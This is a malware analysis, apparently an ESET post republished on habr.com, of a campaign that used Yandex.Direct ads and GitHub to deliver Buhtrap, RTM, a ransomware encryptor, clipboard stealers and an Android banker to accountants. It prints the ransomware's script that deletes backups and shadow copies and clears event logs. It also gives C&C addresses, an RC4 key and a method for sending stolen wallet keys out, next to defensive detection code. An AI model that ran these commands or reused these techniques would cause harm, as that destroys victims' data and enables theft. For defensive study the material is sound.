The backdoor and the Buhtrap encryptor were distributed using Yandex.Direct

To target a cyberattack at accountants, you can use the working documents they search for on the web. That is roughly what a cyber group has been doing over the last few months, distributing the known Buhtrap and RTM backdoors, as well as encryptors and software for stealing cryptocurrency. Most targets are located in Russia. The attack was implemented by placing malicious ads in Yandex.Direct. Potential victims were redirected to a site where they were offered a download of a malicious file disguised as a document template. Yandex removed the malicious ad after our warning.

Buhtrap's source code has been leaked in the past so anyone can use it. We have no information regarding the availability of the RTM code.

In this post, we describe how the attackers distributed malware using Yandex.Direct and hosted it on GitHub. The post concludes with a technical analysis of the malware.


Buhtrap and RTM back in business

Distribution mechanism and victims

The different payloads delivered to victims share a common propagation mechanism. All malicious files created by the attackers were hosted in two different GitHub repositories.

Typically, the repository contained one downloadable malicious file that changed frequently. Since the change history of a GitHub repository is visible, we can see which malware was distributed in a given period. The blanki-shabloni24[.]ru site shown in the figure above was used to convince the victim to download the malicious file.

The design of the site and all the names of the malicious files are based on a single concept: forms, templates, contracts, samples, etc. Considering that Buhtrap and RTM have already been used in attacks on accountants in the past, we assumed that the strategy is the same in the new campaign. The only question was how the victim got to the attackers' site.

Infection

At least some potential victims who ended up on this site were brought there by malicious ads. Below is an example URL:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

As the link shows, the banner was placed on the legitimate accounting forum bb.f2[.]kz. Note that the banners appeared on different sites, all had the same campaign id (blanki_rsya), and most of the sites related to accounting or legal services. The URL also shows that the potential victim used the search query "download invoice form", which supports our hypothesis of targeted attacks. The sites on which the banners appeared and the corresponding search queries are listed below.

  • download invoice form - bb.f2[.]kz
  • sample contract - Ipopen[.]ru
  • statement complaint sample - 77metrov[.]ru
  • contract form - blank-dogovor-kupli-sales[.]ru
  • sample petition - zen.yandex[.]ru
  • sample complaint - yurday[.]ru
  • samples of contract forms - Regforum[.]ru
  • contract form - assistentus[.]ru
  • apartment contract sample - napravah[.]com
  • samples of legal contracts - avito[.]ru

The blanki-shabloni24[.]ru site may have been set up to pass a simple visual check. As a rule, ads pointing to a professional-looking site with a link to GitHub do not look obviously malicious. In addition, the attackers uploaded malicious files to the repository only for limited periods, probably for the duration of an ad campaign; most of the time the GitHub repository contained an empty zip archive or a clean exe file. Thus, the attackers could distribute ads through Yandex.Direct on sites most likely visited by accountants arriving from specific search queries.

Next, consider the various payloads propagated in this way.

Payload Analysis

Chronology of distribution

The malicious campaign began at the end of October 2018 and is active at the time of writing. Because the entire repository was publicly available on GitHub, we compiled an accurate distribution timeline for six different families of malware (see the figure below). We have added a line showing when the link to the banner was detected, according to ESET telemetry, for comparison with the git history. As you can see, this correlates well with the availability of the payload on GitHub. The discrepancy at the end of February can be explained by the fact that we did not have part of the change history, since the repository was removed from GitHub before we could get it in full.

Figure 1. Chronology of malware distribution.

Code signing certificates

The campaign used a variety of certificates. Some of them were used to sign more than one malware family, which further indicates that the different samples belong to the same campaign. Despite having the private key, the operators did not sign the binaries systematically and did not use the key for all samples. At the end of February 2019, the attackers started creating invalid signatures using a certificate owned by Google for which they do not have the private key.

All the certificates involved in the campaign and the families of malware they sign are listed in the table below.


We also used these code signing certificates to look for links to other malware families. For most of the certificates, we did not find samples that were not distributed through the GitHub repository. However, the TOV "MARIYA" certificate was used to sign malware belonging to the Wauchos botnet, adware and miners. It is unlikely that this malware is associated with this campaign; most likely, the certificate was bought on the dark web.

Win32/Filecoder.Buhtrap

The first component that caught our attention, and the first we discovered, was Win32/Filecoder.Buhtrap. This is a Delphi binary that is sometimes packed. It was mainly distributed in February and March 2019. It behaves like a ransomware program: it searches local drives and network shares and encrypts the files it finds. It does not need an internet connection to compromise a machine because it does not contact a server to send encryption keys. Instead, it adds a "token" to the end of the ransom message and suggests using email or Bitmessage to contact the operators.

In order to encrypt as many important resources as possible, Filecoder.Buhtrap runs a thread designed to shut down key software that may hold open file handles on valuable data, which could interfere with encryption. The targeted processes are mainly database management systems (DBMS). In addition, Filecoder.Buhtrap removes log files and backups to make data recovery harder. To do this, it executes the batch script below.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib "%userprofile%\documents\Default.rdp" -s -h
del "%userprofile%\documents\Default.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
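One way to turn the script above into detection logic, as an added example that is not part of the ESET write-up: the process-creation events, the rule names and the per-host threshold are constructed for this example, and classify/scan/ransomware_prep_alerts are hypothetical helper names.

```python
import re
from typing import Dict, List

# Process-creation events constructed for this example (not ESET telemetry).
SAMPLE_EVENTS = [
    'ts=2019-03-04T10:11:12Z host=ACC-PC image=C:\\Windows\\System32\\bcdedit.exe cmdline="bcdedit /set {default} recoveryenabled no"',
    'ts=2019-03-04T10:11:12Z host=ACC-PC image=C:\\Windows\\System32\\wbadmin.exe cmdline="wbadmin delete catalog -quiet"',
    'ts=2019-03-04T10:11:13Z host=ACC-PC image=C:\\Windows\\System32\\vssadmin.exe cmdline="vssadmin delete shadows /all /quiet"',
    'ts=2019-03-04T10:11:13Z host=ACC-PC image=C:\\Windows\\System32\\wevtutil.exe cmdline="wevtutil.exe clear-log Security"',
    'ts=2019-03-04T10:11:14Z host=ACC-PC image=C:\\Windows\\System32\\sc.exe cmdline="sc config eventlog start=disabled"',
    # benign administrative use of the same binaries on another host
    'ts=2019-03-04T10:30:00Z host=HR-PC image=C:\\Windows\\System32\\vssadmin.exe cmdline="vssadmin list shadows"',
    'ts=2019-03-04T10:31:00Z host=HR-PC image=C:\\Windows\\System32\\wevtutil.exe cmdline="wevtutil qe Application /c:5"',
]

# Each rule pairs an image-name pattern with a command-line pattern; both are
# matched against the lower-cased fields, so matching is case-insensitive.
RULES: Dict[str, tuple] = {
    "shadow_copies_deleted":  (r"(vssadmin|wmic)\.exe$",
                               r"\bshadow(s|copy)\b.*\bdelete\b|\bdelete\b.*\bshadow(s|copy)\b"),
    "backups_deleted":        (r"wbadmin\.exe$", r"\bdelete\s+(catalog|backup|systemstatebackup)\b"),
    "boot_recovery_disabled": (r"bcdedit\.exe$", r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures"),
    "event_log_cleared":      (r"wevtutil\.exe$", r"\b(cl|clear-log)\s+\w+"),
    "event_log_svc_disabled": (r"\bsc\.exe$", r"\bconfig\b.*\beventlog\b.*start=\s*disabled"),
    "rdp_history_wiped":      (r"reg\.exe$", r"\bdelete\b.*terminal server client"),
}

EVENT_RE = re.compile(r'host=(\S+) image=(\S+) cmdline="([^"]*)"')


def classify(image: str, cmdline: str) -> List[str]:
    """Return the names of all rules matched by one process-creation event."""
    image, cmdline = image.lower(), cmdline.lower()
    return [name for name, (img_re, cmd_re) in RULES.items()
            if re.search(img_re, image) and re.search(cmd_re, cmdline)]


def scan(lines: List[str]) -> Dict[str, List[str]]:
    """Map each host to the sorted set of distinct rules its events triggered."""
    per_host: Dict[str, set] = {}
    for line in lines:
        m = EVENT_RE.search(line)
        if not m:
            continue  # malformed line: skip it rather than crash the pipeline
        host, image, cmdline = m.groups()
        for rule in classify(image, cmdline):
            per_host.setdefault(host, set()).add(rule)
    return {host: sorted(rules) for host, rules in per_host.items()}


def ransomware_prep_alerts(lines: List[str], threshold: int = 3) -> List[str]:
    """Hosts where at least `threshold` distinct recovery-inhibition rules fired.

    A lone 'vssadmin delete shadows' can be legitimate maintenance; the
    combination seen in the Buhtrap script is what makes it worth paging on.
    """
    return sorted(host for host, rules in scan(lines).items() if len(rules) >= threshold)


if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
    print("alerts:", ransomware_prep_alerts(SAMPLE_EVENTS))
```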

Filecoder.Buhtrap uses a legitimate online IP Logger service designed to collect information about website visitors. It is used to track ransomware victims; the following command line is responsible for this:

mshta.exe "javascript:document.write('');"

Files are selected for encryption if they match none of three exclusion lists. First, files with the following extensions are not encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys, and .bat. Second, all files whose full path contains one of the directory strings listed below are excluded.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
google\chrome
google
boot
application data
apple computer\safari
appdata
all users
:\windows
:\system volume information
:\nvidia
:\intel

Third, certain filenames are also excluded from encryption, among them the filename of the ransom note. The list is given below. Obviously, all these exclusions are intended to keep the machine bootable and running, but only just.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

File Encryption Scheme

Once launched, the malware generates a 512-bit RSA key pair. The private exponent (d) and modulus (n) are then encrypted with a hardcoded 2048-bit public key (public exponent and modulus), compressed with zlib, and base64 encoded. The code responsible for this is shown in Figure 2.

Figure 2. The result of Hex-Rays decompiling the process of generating a 512-bit RSA key pair.

Below is an example of a generated private key in plain text; this is the token appended to the ransom message.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

The public key of the attackers is shown below.

e = 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
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

The files are encrypted using AES-128-CBC with a 256-bit key. A new key and a new initialization vector are generated for each encrypted file, and the key information is appended to the end of the encrypted file. Consider the format of an encrypted file. Encrypted files have the following header:


The original file data, prefixed with the VEGA magic value, is encrypted up to the first 0x5000 bytes. All the information needed for decryption is appended to the file with the following structure:


- The file size marker is a flag indicating whether the file is larger than 0x5000 bytes
- AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key pair))
- RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hardcoded RSA public key))

Win32/ClipBanker

Win32/ClipBanker is a component that was distributed intermittently from late October to early December 2018. Its role is to monitor the contents of the clipboard, looking for cryptocurrency wallet addresses. Once it has identified a target wallet address, ClipBanker replaces it with an address presumably belonging to the operators. The samples we studied were neither packed nor obfuscated. The only mechanism used to mask behavior is string encryption; the operators' wallet addresses are encrypted with RC4. The targeted cryptocurrencies are Bitcoin, Bitcoin Cash, Dogecoin, Ethereum and Ripple.

During the malware's distribution period, only a small amount of BTC was sent to the attackers' Bitcoin wallets, which casts doubt on the success of the campaign. Moreover, there is no reason to believe that these transactions were related to ClipBanker at all.

Win32/RTM

The Win32/RTM component was distributed over several days in early March 2019. RTM is a banking Trojan written in Delphi that targets remote banking systems. In 2017, ESET researchers published a detailed analysis of this program, and the description is still relevant. In January 2019, Palo Alto Networks also released a blog post about RTM.

Buhtrap Loader

For a while, a loader was available on GitHub that looked nothing like Buhtrap's previous tools. It contacts https://94.100.18[.]67/RSS.php?<some_id> to fetch the next stage and loads it directly into memory. We observed two behaviors for the second-stage code. In the first case, the RSS.php URL served the Buhtrap backdoor directly; this backdoor is very similar to the one that has been available since the source code leak.

Interestingly, we see several campaigns using the Buhtrap backdoor, presumably run by different operators. In this case, the main difference is that the backdoor is loaded directly into memory and does not use the usual scheme with the DLL deployment process we described before. In addition, the operators changed the RC4 key used to encrypt network traffic to the C&C server; in most of the campaigns we have seen, the operators did not bother to change this key.

In the second, more complex case, the RSS.php URL served another loader. It implements some obfuscation, such as rebuilding the dynamic import table. The loader's purpose is to contact the C&C server msiofficeupd[.]com/api/F27F84EDA4D13B15/2, send logs and wait for a response. It treats the response as a blob, loads it into memory and executes it. The payload we saw when running this loader was the same Buhtrap backdoor, but there may be other components.

Android/Spy.Banker

Interestingly, an Android component was also found in the GitHub repository. It was in the main branch for only one day, November 1, 2018. Apart from its being hosted on GitHub, ESET telemetry shows no evidence of this malware spreading.

The component was hosted as an Android Application Package (APK). It is heavily obfuscated. The malicious behavior is hidden in an encrypted JAR inside the APK. It is RC4 encrypted with this key:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

The same key and algorithm are used to encrypt strings. The JAR is located at APK_ROOT + image/files. The first 4 bytes of the file contain the length of the encrypted JAR, which starts immediately after the length field.
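An extractor for the container format just described, as an added example that is not ESET's tooling: RC4 is implemented inline so only the standard library is needed, and because RC4 is symmetric the same routine builds a constructed sample container from a placeholder JAR to exercise the parser. The little-endian length field is an assumption, as are the helper names.

```python
import io
import struct
import zipfile
from typing import List

# RC4 key recovered from the dropper (the 37 bytes listed above).
RC4_KEY = bytes([
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96,
])


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:        # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def extract_jar(container: bytes) -> bytes:
    """Parse 'image/files': a 4-byte length, then the RC4-encrypted JAR.

    Little-endian length is an assumption; switch to '>I' if a real sample
    yields a nonsense length. Bytes after the JAR are ignored.
    """
    if len(container) < 4:
        raise ValueError("container too short for a length field")
    (length,) = struct.unpack("<I", container[:4])
    encrypted = container[4:4 + length]
    if len(encrypted) != length:
        raise ValueError(f"truncated: header says {length} bytes, got {len(encrypted)}")
    jar = rc4(RC4_KEY, encrypted)
    if jar[:2] != b"PK":  # every JAR is a ZIP; anything else means wrong key/endianness
        raise ValueError("decrypted data is not a ZIP/JAR")
    return jar


def jar_entries(jar: bytes) -> List[str]:
    return zipfile.ZipFile(io.BytesIO(jar)).namelist()


def build_sample_container(jar: bytes) -> bytes:
    """Constructed stand-in for the dropper's file, used only to exercise the parser."""
    return struct.pack("<I", len(jar)) + rc4(RC4_KEY, jar)


def make_placeholder_jar() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("classes.dex", b"placeholder, not real Anubis code")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_container(make_placeholder_jar()) + b"\x00" * 16  # trailing padding
    print(jar_entries(extract_jar(sample)))
```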

After decrypting the file, we found that it was Anubis, a previously documented Android banker. The malware has the following features:

  • microphone recording
  • screenshots
  • getting GPS coordinates
  • adware
  • device data encryption and ransom demand
  • spamming

Interestingly, the banker uses Twitter as a backup communication channel to obtain another C&C server. The sample we analyzed used the @JohnesTrader account, but at the time of analysis it had already been blocked.

The banker contains a list of target applications on the Android device. It has grown longer than the list obtained during the Sophos study. The list includes many banking applications, online shopping apps such as Amazon and eBay, and cryptocurrency services.

MSIL/ClipBanker.IH

The last component distributed as part of this campaign is a .NET Windows executable that appeared in March 2019. Most of the versions studied were packed with ConfuserEx v1.0.0. Like ClipBanker, this component targets the clipboard. It goes after a wide range of cryptocurrencies as well as Steam trade offers. In addition, it uses the IP Logger service to steal Bitcoin WIF private keys.

Protection Mechanisms

In addition to the anti-debugging, anti-dumping and anti-tampering protections that ConfuserEx provides, the component can detect antivirus products and virtual machines.

To check whether it is running in a virtual machine, the malware uses the built-in Windows WMI command-line tool (WMIC) to query BIOS information:

wmic bios

The program then parses the command output and looks for the keywords VBOX, VirtualBox, XEN, qemu, bochs and VM.

To detect antivirus products, the malware sends a Windows Management Instrumentation (WMI) query to the Windows Security Center using the ManagementObjectSearcher API, as shown below. After base64 decoding, the call looks like this:

ManagementObjectSearcher('root\SecurityCenter2', 'SELECT * FROM AntivirusProduct')

Figure 3. The process of defining antivirus products.

In addition, the malware checks whether CryptoClipWatcher, a tool that protects against clipboard attacks, is running and, if so, suspends all of that process's threads, thereby disabling the protection.

Persistence

The version of the malware we studied copies itself to %APPDATA%\google\updater.exe and sets the "hidden" attribute on the google directory. It then changes the Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell value in the Windows registry, adding the path to updater.exe. This way, the malware is executed every time the user logs in.
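A small audit of the persistence location above, as an added example that is not from the post: audit_shell_value is a pure function so it can be exercised on any platform with constructed values, while read_winlogon_shell performs the live registry read only on Windows. Both function names and the list of user-writable directories are assumptions.

```python
import os
import sys
from typing import Dict, List

DEFAULT_SHELL = "explorer.exe"
WINLOGON_KEY = r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Directories a legitimate shell entry never lives in; this sample uses %APPDATA%\google.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")


def audit_shell_value(value: str) -> List[str]:
    """Return human-readable findings for one Winlogon 'Shell' value (empty list = clean).

    The value is a comma-separated list; Windows launches every entry at logon,
    which is exactly what the malware exploits by appending updater.exe.
    """
    findings: List[str] = []
    entries = [e.strip() for e in value.split(",") if e.strip()]
    if not entries:
        return ["Shell value is empty; Windows would fall back to explorer.exe"]
    first = entries[0].lower().rsplit("\\", 1)[-1]
    if first != DEFAULT_SHELL:
        findings.append(f"first shell entry is not explorer.exe: {entries[0]!r}")
    for extra in entries[1:]:
        # expandvars resolves %VAR% on Windows; elsewhere it leaves the literal,
        # so the unexpanded %APPDATA% token is matched as well.
        expanded = os.path.expandvars(extra).lower()
        note = f"extra program launched at logon: {extra!r}"
        if "%appdata%" in extra.lower() or any(d in expanded for d in USER_WRITABLE):
            note += " (runs from a user-writable directory)"
        findings.append(note)
    return findings


def read_winlogon_shell() -> Dict[str, str]:
    """Live read of the Shell value from both hives; empty dict off Windows."""
    if sys.platform != "win32":
        return {}
    import winreg  # only importable on Windows
    result: Dict[str, str] = {}
    for hive_name, hive in (("HKLM", winreg.HKEY_LOCAL_MACHINE), ("HKCU", winreg.HKEY_CURRENT_USER)):
        try:
            with winreg.OpenKey(hive, WINLOGON_KEY) as key:
                result[hive_name] = winreg.QueryValueEx(key, "Shell")[0]
        except FileNotFoundError:
            pass  # HKCU normally has no Shell value at all; HKLM always does
    return result


if __name__ == "__main__":
    for hive, value in read_winlogon_shell().items():
        for finding in audit_shell_value(value) or ["clean"]:
            print(f"{hive}: {finding}")
```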

Malicious behavior

Like ClipBanker, the malware monitors the clipboard for cryptocurrency wallet addresses and, when it finds one, replaces it with one of the operators' addresses. Below is the list of target address types found in the code.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

For each address type there is a corresponding regular expression. The STEAM_URL value is used to attack the Steam platform, as seen in the regular expression used to detect trade offer links in the clipboard:

\b(https://|http://|)steamcommunity\.com/tradeoffer/new/\?partner=[0-9]+&token=[a-zA-Z0-9]+\b

Exfiltration channel

In addition to replacing addresses in the clipboard, the malware targets the WIF private keys of Bitcoin, Bitcoin Core and Electrum Bitcoin wallets. The program uses iplogger.org as the exfiltration channel for the WIF private key. To do this, the malware places the private key data in the User-Agent HTTP header, as shown below.

Figure 4. IP Logger console with output.

The operators did not use iplogger.org to exfiltrate wallets. They probably resorted to a different method because of the 255-character limit of the User-Agent field displayed in the IP Logger web interface. In the samples we studied, another output server was stored in the DiscordWebHook environment variable. Surprisingly, this environment variable is not assigned anywhere in the code, which suggests that the malware is still under development and the variable is set on the operator's test machine.

There is another sign that the program is in development. The binary includes two iplogger.org URLs, both of which are requested when data is exfiltrated. In the request to one of these URLs, the value of the Referer field is prefixed with "DEV /". We also found a version that was not packed with ConfuserEx, in which the recipient for this URL is named DevFeedbackUrl. Based on the environment variable name, we believe that the operators plan to use the legitimate Discord service and its webhook mechanism to steal cryptocurrency wallets.

Conclusion

This campaign is an example of the use of legitimate advertising services in cyberattacks. The scheme targets Russian organizations, but we would not be surprised to see a similar attack using non-Russian services. To avoid compromise, users must check the reputation of the source of any downloaded software.

A complete list of indicators of compromise and MITRE ATT&CK techniques is available at the link.

Source: habr.com
